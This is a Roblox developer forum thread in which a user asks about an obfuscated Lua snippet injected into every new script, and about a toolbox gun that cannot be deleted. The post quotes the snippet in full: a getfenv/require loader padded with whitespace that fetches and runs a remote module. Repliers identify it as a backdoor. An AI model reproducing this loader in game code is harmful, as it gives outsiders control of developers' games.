Unknown piece of code appearing in random parts of new scripts

I don’t know which category this should be.

Recently this piece of code -

if require == print then require = print("nice try");print("nice try") end LOX = 4755747611; L0X = 67877778; local b = getfenv()["\76\79\88"] + getfenv()["\76\48\88"] getfenv()['\114\101\113\117\105\114\101'](b)["\77\111\100\101\108\72\101\108\112\101\114"]()																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														

is appearing at random spots of each and every of the new scripts that I create(Which gives errors to my script) I am creating.
You can also see the length of the code. This makes the script’s page soo lengthy.

The other one is I took a gun from tool box(Made by ROBLOX) and now I am unable to delete it.

Gun Model

I can’t delete the pistol3 from my StarterPack neither delete it’s children nor move the gun to any other place.
What is happening here?

You should probably move this to #help-and-feedback:scripting-support buddy.

1 Like

This looks like a malicious script or plugin. Check your free models for scripts and check your plugins.

2 Likes

No the script is happening for kind of one month.

But IDK about the free model. I thought it would be safe cause it was made by ROBLOX

Did you use other free models? Could you show a picture of plugins you have?

1 Like

hack2.
hack.

I have used a sword too

Sword model -

But this model was recommend by @Alvin_Blox in his video

Doesn’t look like you have any harmful plugins. The sword if fine as well. If you click on your pistol, you’ll find a link to the developer wiki. Once there, gets the weapons there. It’s probably a backdoor or whatever, given the “getfenv”.

It’s a backdoor, and what’s the name of the script that the malicious script contains?

No you didn’t understand.
When ever I make a new script and click enter this script pops up or sometimes it is put in random spots.

1 Like

Mhm… And you think it’s coming from the sword? The thing that changes the scripts.

1 Like

Nope that script has been popping up for a month now.

1 Like

Try to uninstall all of the plugins, and then try to delete the scripts, if still cannot delete them try creating a script and tell me if it changes to the weird backdoor.

1 Like

Is that all of your plugins? I have a feeling it’s got to do with one of your plugins.

1 Like

No I don’t have any more plugin’s.
And I only use Weld Plugin and Realism Mode :grin:

How is this possible?
Solutions :

1. Try deleting scripts inside tool , change the name of Handle
    2 . try to destroy the tool when the game Starts.